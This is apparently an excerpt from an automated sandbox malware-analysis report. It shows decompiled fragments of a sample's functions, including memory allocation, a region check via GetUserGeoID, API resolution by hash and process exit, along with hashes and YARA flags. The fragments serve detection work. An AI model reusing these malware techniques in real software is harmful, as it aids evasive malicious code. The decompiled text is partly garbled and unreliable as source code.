                                                                    				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
                                                                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                    				return _t14;
                                                                    			}




                                                                    0x0041e7ea
                                                                    0x0041e80c
                                                                    0x0041e810

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E80C
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_jmaxbgpy.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                                                    • Instruction ID: 27bf8a3fb07fce7131f8418fc0fb77bd2b10fdbd594230fdd84e61d9d7c2cc87
                                                                    • Opcode Fuzzy Hash: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                                                    • Instruction Fuzzy Hash: BBF01EB6200208ABCB18DF89DC81EEB77ADAF88754F018159BE0897241C630F911CBB4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041E723(intOrPtr _a4, void* _a8) {
                                                                    				long _t8;
                                                                    
                                                                    				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
                                                                    				_t8 = NtClose(_a8); // executed
                                                                    				return _t8;
                                                                    			}




                                                                    0x0041e73a
                                                                    0x0041e748
                                                                    0x0041e74c

                                                                    APIs
                                                                    • NtClose.NTDLL(00410328,00000000,?,00410328,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E748
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_jmaxbgpy.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                                                    • Instruction ID: 9c4ed7dd7ad381e5692115c9670513ce9f617838e6ca6e8741f9ee3af2ac2269
                                                                    • Opcode Fuzzy Hash: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                                                    • Instruction Fuzzy Hash: 3CD01776604214ABD610EBA9DC89FD77BACDF48664F0184A9BA1C5B242C571FA0086E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6ce0e258aa738072e7f647c51230e9201616741c23f9c2d0737f4fa7881f3263
                                                                    • Instruction ID: 38c60c9c5987a87ade63d86acf0ad3c52234d84a5a182d682657b57437046be7
                                                                    • Opcode Fuzzy Hash: 6ce0e258aa738072e7f647c51230e9201616741c23f9c2d0737f4fa7881f3263
                                                                    • Instruction Fuzzy Hash: C190026260100502E21171994404616044AD7D0381F91C076A102455DECAA589A2F171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 59d7e19e3eca5daac8c048b8cf78f22be02dbb158a0acd4685114866447d0f96
                                                                    • Instruction ID: 33d3b366108972303e3c52bfb089dde854f3d0e071710561d69626bfdc4f1fd3
                                                                    • Opcode Fuzzy Hash: 59d7e19e3eca5daac8c048b8cf78f22be02dbb158a0acd4685114866447d0f96
                                                                    • Instruction Fuzzy Hash: 8890027220100413E221619945047070449D7D0381F91C466A042455CD96D68962F161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: bc7148191d4a4c85a8cac427bd876d1c1ba18785299265bcf516f4a730e93b23
                                                                    • Instruction ID: f9270b7e0f82d6f1991b7aef2c8e4c4914d400f4d228e2201784994da99aba5e
                                                                    • Opcode Fuzzy Hash: bc7148191d4a4c85a8cac427bd876d1c1ba18785299265bcf516f4a730e93b23
                                                                    • Instruction Fuzzy Hash: 7090026224204152A655B19944045074446E7E0381791C066A1414958C85A69866E661
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: e2465bee407adce523d220016577bb21d6f48f7055d0ec5b486a879eb308ffed
                                                                    • Instruction ID: a49be56c60f79f66e4f4417ddec70c7bf654e831ac47f2e65f4b450003604300
                                                                    • Opcode Fuzzy Hash: e2465bee407adce523d220016577bb21d6f48f7055d0ec5b486a879eb308ffed
                                                                    • Instruction Fuzzy Hash: 8F9002A234100442E21061994414B060445D7E1341F51C069E106455CD8699CC62B166
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6725ef145efd79e6a99f7c681cd2f1432383489db19a5540b36a4f3c0346ad90
                                                                    • Instruction ID: aee400a18e5975c5bd04f11886a138cf87def92b3cb6faa3bd63cf6596d6fe2a
                                                                    • Opcode Fuzzy Hash: 6725ef145efd79e6a99f7c681cd2f1432383489db19a5540b36a4f3c0346ad90
                                                                    • Instruction Fuzzy Hash: 5B9002B220100402E250719944047460445D7D0341F51C065A506455CE86D98DE5B6A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 45606073b0eb2c7beaa070f176b7c934d3fa5b3ff2f9b9d18c9f67df5a8b63b6
                                                                    • Instruction ID: 721f9cb85ee728b2a5c9d17bf2a08e603cc9c910fa433705a222a7d8d73de292
                                                                    • Opcode Fuzzy Hash: 45606073b0eb2c7beaa070f176b7c934d3fa5b3ff2f9b9d18c9f67df5a8b63b6
                                                                    • Instruction Fuzzy Hash: E090026260100042925071A988449064445FBE1351751C175A0998558D85D98875A6A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 18155b5369bfdd871277294abe6f630a8946b7204f7a8c64200d22f2f3e80fbb
                                                                    • Instruction ID: f8dafc996cad0b1420dcb86850c8424528aa4540b361dd03382a96d5af7b2aa9
                                                                    • Opcode Fuzzy Hash: 18155b5369bfdd871277294abe6f630a8946b7204f7a8c64200d22f2f3e80fbb
                                                                    • Instruction Fuzzy Hash: 6F90027220140402E2106199481470B0445D7D0342F51C065A116455DD86A58861B5B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: ed214d98f9d2b6e48766cefadb3b2f1b46dfba1c07b43fb5fa9a75bd06602ea0
                                                                    • Instruction ID: c31aad2699236ece3cc13049112d8348dfaa9e4ebf4db858b6c1282cf15b66a9
                                                                    • Opcode Fuzzy Hash: ed214d98f9d2b6e48766cefadb3b2f1b46dfba1c07b43fb5fa9a75bd06602ea0
                                                                    • Instruction Fuzzy Hash: 4F90026221180042E31065A94C14B070445D7D0343F51C169A015455CCC9958871A561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 769860cbb8a378638b446b86791a193f94f43d38e60c27f11ea6b958babcc5ed
                                                                    • Instruction ID: 53e9bd124b765e80f14eaa712b881d3c6c690ff46bca6d91d9c9a931c7c1ba39
                                                                    • Opcode Fuzzy Hash: 769860cbb8a378638b446b86791a193f94f43d38e60c27f11ea6b958babcc5ed
                                                                    • Instruction Fuzzy Hash: D99002A220200003921571994414616444AD7E0341B51C075E1014598DC5A588A1B165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d1f53b4ba7b9d7b3038867c66f0122e005ca26360ffa9b6cc92e5a4dd0f64672
                                                                    • Instruction ID: a47fe44ee44b720e8bbaf41e346c382c2bf0c91f565b75253757819afc6111ea
                                                                    • Opcode Fuzzy Hash: d1f53b4ba7b9d7b3038867c66f0122e005ca26360ffa9b6cc92e5a4dd0f64672
                                                                    • Instruction Fuzzy Hash: 80900266211000035215A59907045070486D7D5391351C075F1015558CD6A18871A161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: fd559f523f5275fc286e5b43bf21da97c4ca7295e206d7ffff02f655618a8751
                                                                    • Instruction ID: b39a88afcfee89752d381567343b55fa3eb99d4b6067ad06a13de3de3180f2c5
                                                                    • Opcode Fuzzy Hash: fd559f523f5275fc286e5b43bf21da97c4ca7295e206d7ffff02f655618a8751
                                                                    • Instruction Fuzzy Hash: 1490027220108802E2206199840474A0445D7D0341F55C465A442465CD86D588A1B161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6ea121f0730567060e99a15ef92669b1358f30c93a174bb0e2fef9ae4e3e95e5
                                                                    • Instruction ID: 89217e3e766221b55d344b28853367cdf4ff66c9f2eed02b7efd8e73c17df286
                                                                    • Opcode Fuzzy Hash: 6ea121f0730567060e99a15ef92669b1358f30c93a174bb0e2fef9ae4e3e95e5
                                                                    • Instruction Fuzzy Hash: C790027220100802E2907199440464A0445D7D1341F91C069A002565CDCA958A69B7E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 09a7a6aa45aa79aa076b1b6e84098ed5721290a436c942c6f2a0a5fd7a6ea331
                                                                    • Instruction ID: 1b0a651735c27ed3dccb8e1106bc2ece52c520f72a5df2fa31cc4aedb203255d
                                                                    • Opcode Fuzzy Hash: 09a7a6aa45aa79aa076b1b6e84098ed5721290a436c942c6f2a0a5fd7a6ea331
                                                                    • Instruction Fuzzy Hash: 1C90026230100003E250719954186064445E7E1341F51D065E041455CCD9958866A262
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 2b5484583c8e11abf0546e6163a48aea15437662e91a463176ea86ecbd87aac4
                                                                    • Instruction ID: 25d84ef502cca678b9d6221c364d5445cc460ae19c2d623ee562180b4174949b
                                                                    • Opcode Fuzzy Hash: 2b5484583c8e11abf0546e6163a48aea15437662e91a463176ea86ecbd87aac4
                                                                    • Instruction Fuzzy Hash: E290026A21300002E2907199540860A0445D7D1342F91D469A001555CCC9958879A361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9be0f6a5772e487741c7565a3e0711ed71eeb48b8dec782d9d854aab43c05de0
                                                                    • Instruction ID: dc216a90dba302d4eee3dbe0a699ba85f72e60d12f14376749cf7359fa4ac185
                                                                    • Opcode Fuzzy Hash: 9be0f6a5772e487741c7565a3e0711ed71eeb48b8dec782d9d854aab43c05de0
                                                                    • Instruction Fuzzy Hash: 0C90027231114402E220619984047060445D7D1341F51C465A082455CD86D588A1B162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1d1c3691f6fc03f77f66d7b53a444ad82dc1009b050545e96bbc7e52c78f39b7
                                                                    • Instruction ID: 1f03a23ec1a8910f98b96e5c7e67ed0ff46a3554234b994723c3a80cd6ab346f
                                                                    • Opcode Fuzzy Hash: 1d1c3691f6fc03f77f66d7b53a444ad82dc1009b050545e96bbc7e52c78f39b7
                                                                    • Instruction Fuzzy Hash: BF90027220100402E21065D954086460445D7E0341F51D065A502455DEC6E588A1B171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3 41e943-41e96f call 41f243 ExitProcess
                                                                    C-Code - Quality: 100%
                                                                    			E0041E943(intOrPtr _a4, int _a8) {
                                                                    
                                                                    				_t5 = _a4;
                                                                    				E0041F243( *((intOrPtr*)(_a4 + 0x164)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x164)), 0, 0x36);
                                                                    				ExitProcess(_a8);
                                                                    			}



                                                                    0x0041e946
                                                                    0x0041e95d
                                                                    0x0041e96b

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E96B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_jmaxbgpy.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID: w5@
                                                                    • API String ID: 621844428-2048009441
                                                                    • Opcode ID: ddff7cea5deb504553f35d9d56e2b182a7c93aee5d24c6ec521c17bd09e3aeca
                                                                    • Instruction ID: 28662ead1a8a2610f8e7ad364a80deeb4b3648c83f3036173ff49b3b7ba48b6c
                                                                    • Opcode Fuzzy Hash: ddff7cea5deb504553f35d9d56e2b182a7c93aee5d24c6ec521c17bd09e3aeca
                                                                    • Instruction Fuzzy Hash: CAD01776A003147BCA20EB99CC85FD777ACDF457A4F0180A5BA4C5B282C675BA00C7E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 21%
                                                                    			E0041E935() {
                                                                    
                                                                    				asm("daa");
                                                                    				asm("int 0xa2");
                                                                    				asm("loope 0xffffff9e");
                                                                    				asm("stc");
                                                                    				_push(0x9f547df3);
                                                                    				_t7 =  *0xFFFFFFFF8BEC8B5D;
                                                                    				E0041F243( *((intOrPtr*)( *0xFFFFFFFF8BEC8B5D + 0x164)), _t7, _t7 + 0xaa8,  *((intOrPtr*)( *0xFFFFFFFF8BEC8B5D + 0x164)), 0, 0x36);
                                                                    				ExitProcess( *0xFFFFFFFF8BEC8B61);
                                                                    			}



                                                                    0x0041e935
                                                                    0x0041e938
                                                                    0x0041e93a
                                                                    0x0041e93c
                                                                    0x0041e93d
                                                                    0x0041e946
                                                                    0x0041e95d
                                                                    0x0041e96b

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00418CB9,?,00419460,00419460,?,00418CB9,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8F0
                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E96B
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_jmaxbgpy.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateExitHeapProcess
                                                                    • String ID:
                                                                    • API String ID: 1054155344-0
                                                                    • Opcode ID: d9de683a8bfab9e82bb086d4083715190b7a9b1252d4d09981e748e756a53aaf
                                                                    • Instruction ID: cf9cc797f96d59935dff7869ae2ce17e4b40744dbe2bb0b75c86a5cc178cc62b
                                                                    • Opcode Fuzzy Hash: d9de683a8bfab9e82bb086d4083715190b7a9b1252d4d09981e748e756a53aaf
                                                                    • Instruction Fuzzy Hash: 5EF024B8A041006BC710DBA4CC85ED33BA8EF85204F144499BC980B202C179E91583F1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 84%
                                                                    			E004098A3(void* __eflags, intOrPtr _a4, long _a8) {
                                                                    				char _v67;
                                                                    				char _v68;
                                                                    				void* _t13;
                                                                    				int _t15;
                                                                    				long _t25;
                                                                    				int _t27;
                                                                    				void* _t28;
                                                                    				void* _t32;
                                                                    
                                                                    				_t32 = __eflags;
                                                                    				_v68 = 0;
                                                                    				E00420213( &_v67, 0, 0x3f);
                                                                    				E00420CC3( &_v68, 3);
                                                                    				_t19 = _a4;
                                                                    				_t13 = E0040CF23(_t32, _a4 + 0x20,  &_v68); // executed
                                                                    				_t15 = E00419603(_a4 + 0x20, _t13, 0, 0, E00402E13(0x2ef2527b));
                                                                    				_t27 = _t15;
                                                                    				if(_t27 != 0) {
                                                                    					_t25 = _a8;
                                                                    					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
                                                                    					if(_t15 == 0) {
                                                                    						return  *_t27(_t25, 0x8003, _t28 + (E0040C5F3(1, 8, _t19 + 0x540) & 0x000000ff) - 0x40, _t15);
                                                                    					}
                                                                    				}
                                                                    				return _t15;
                                                                    			}











                                                                    0x004098a3
                                                                    0x004098b4
                                                                    0x004098b8
                                                                    0x004098c3
                                                                    0x004098c8
                                                                    0x004098d3
                                                                    0x004098eb
                                                                    0x004098f0
                                                                    0x004098f7
                                                                    0x004098f9
                                                                    0x00409906
                                                                    0x0040990a
                                                                    0x00000000
                                                                    0x0040992e
                                                                    0x0040990a
                                                                    0x00409936

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(000072B1,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409906
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_jmaxbgpy.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 8c8e9f467bb6879c5a8c78f1d0dc2f5625c34b38545da03a8c9cbc3b65211247
                                                                    • Instruction ID: 8f2db9fe8dd4293e769d4f79dd02f83159bb7ad0b88680d8187a7f3a5710d2c7
                                                                    • Opcode Fuzzy Hash: 8c8e9f467bb6879c5a8c78f1d0dc2f5625c34b38545da03a8c9cbc3b65211247
                                                                    • Instruction Fuzzy Hash: 6C019B71A4022876E720A695DC82FEF775C9B45B54F14012DFB047A2C2D6A8AD0647F9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 229 41e8f5-41e901 230 41e930-41e934 RtlFreeHeap 229->230 231 41e903-41e91a call 41f243 229->231 233 41e91f-41e92f 231->233 233->230
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,07110A7A,00000000,?), ref: 0041E930
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_jmaxbgpy.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: 55a0592ddd3e87e94e10c422cadf91ba0204797f2d40f8ce93b3a82e1634df7f
                                                                    • Instruction ID: 1f4064dec4080926383eea4deb29f94a4842a973331a5e3ad2f339e89f1cfb14
                                                                    • Opcode Fuzzy Hash: 55a0592ddd3e87e94e10c422cadf91ba0204797f2d40f8ce93b3a82e1634df7f
                                                                    • Instruction Fuzzy Hash: A9F085B5210208ABCB18EF89CC48EA777A8EF88310F004959F90967252C634FA05CAA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 239 41e8c3-41e8f4 call 41f243 RtlAllocateHeap
                                                                    C-Code - Quality: 100%
                                                                    			E0041E8C3(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                    				void* _t10;
                                                                    
                                                                    				_t3 = _a4 + 0xa9c; // 0xa9c
                                                                    				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
                                                                    				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                    				return _t10;
                                                                    			}




                                                                    0x0041e8d2
                                                                    0x0041e8da
                                                                    0x0041e8f0
                                                                    0x0041e8f4

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00418CB9,?,00419460,00419460,?,00418CB9,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_jmaxbgpy.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                                                    • Instruction ID: 54a437fc11085ca12ae2a9f31c46b1b25ee2b1612e845e8a2c08afeac8ca904d
                                                                    • Opcode Fuzzy Hash: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                                                    • Instruction Fuzzy Hash: 67E046B6600208ABCB14EF89DC45EE737ACEF88764F018059FE085B242C670F914CAF1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 234 4100a3-4100bc 235 4100c2-4100c7 234->235 236 4100bd call 419603 234->236 237 4100c9-4100ca 235->237 238 4100cb-4100dc GetUserGeoID 235->238 236->235
                                                                    C-Code - Quality: 37%
                                                                    			E004100A3(intOrPtr _a4) {
                                                                    				intOrPtr* _t7;
                                                                    				void* _t8;
                                                                    
                                                                    				_t7 = E00419603(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
                                                                    				if(_t7 != 0) {
                                                                    					_t8 =  *_t7(0x10); // executed
                                                                    					return 0 | _t8 == 0x000000f1;
                                                                    				} else {
                                                                    					return _t7;
                                                                    				}
                                                                    			}





                                                                    0x004100bd
                                                                    0x004100c7
                                                                    0x004100cd
                                                                    0x004100dc
                                                                    0x004100ca
                                                                    0x004100ca
                                                                    0x004100ca

                                                                    APIs
                                                                    • GetUserGeoID.KERNELBASE(00000010), ref: 004100CD
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_jmaxbgpy.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: User
                                                                    • String ID:
                                                                    • API String ID: 765557111-0
                                                                    • Opcode ID: 5c78032def2810ca0ad8a16165e38517362f870899e299bda81b49b85eaa7669
                                                                    • Instruction ID: c28064bcec0e87ed17199b1c401a6025e046bcfeae29810ee43e910d84b218be
                                                                    • Opcode Fuzzy Hash: 5c78032def2810ca0ad8a16165e38517362f870899e299bda81b49b85eaa7669
